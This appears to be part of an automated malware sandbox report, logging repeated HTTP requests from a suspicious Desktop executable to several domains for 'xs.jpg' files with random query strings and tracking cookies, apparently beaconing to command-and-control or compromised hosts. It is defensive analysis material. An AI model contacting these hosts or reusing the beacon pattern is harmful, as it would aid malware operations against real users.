                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:07.376405954 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:07.597104073 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:07 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:07 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.94972254.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:07.791090965 CEST308OUTGET /images/xs.jpg?17b6de9=198930248 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159264|1720159259|2|2|0
                                  Jul 5, 2024 08:01:08.564337015 CEST594INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:08 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159268|1720159259|3|3|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.94972344.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:08.741807938 CEST299OUTGET /xs.jpg?1952911=185868151 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159265|1720159259|3|2|0
                                  Jul 5, 2024 08:01:09.288011074 CEST585INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:09 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159269|1720159259|3|3|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.94972444.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:09.303761959 CEST302OUTGET /images/xs.jpg?1a33e4b=109902124 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159265|1720159260|2|2|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:09.805706024 CEST333INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:09 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159269|1720159260|3|3|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  14192.168.2.94972578.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:09.815491915 CEST190OUTGET /xs.jpg?1b6026e=172232340 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:10.472045898 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:10 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  15192.168.2.94972637.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:10.581201077 CEST203OUTGET /images/xs2.jpg?1c98993=269866539 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:11.290601969 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:11 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:11.297154903 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:11.528616905 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:11 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:11 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  16192.168.2.94972754.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:11.730487108 CEST308OUTGET /images/xs.jpg?20ae1e9=239873375 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159268|1720159259|3|3|0
                                  Jul 5, 2024 08:01:12.493103981 CEST594INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:12 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159272|1720159259|3|4|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  17192.168.2.94972944.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:12.546374083 CEST299OUTGET /xs.jpg?224a908=215742000 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159269|1720159259|3|3|0
                                  Jul 5, 2024 08:01:13.055702925 CEST585INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:12 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159272|1720159259|3|4|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  18192.168.2.94973044.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:13.080097914 CEST302OUTGET /images/xs.jpg?256dbec=353221452 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159269|1720159260|3|3|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:13.565224886 CEST333INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:13 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159273|1720159260|3|4|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  19192.168.2.94973178.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:13.592689991 CEST190OUTGET /xs.jpg?263e0bf=360900279 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:14.244424105 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:14 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  20192.168.2.94973237.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:14.294188023 CEST203OUTGET /images/xs2.jpg?27da790=167157312 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:15.022315025 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:14 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:15.029609919 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:15.256031990 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:15 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:15 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  21192.168.2.94973354.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
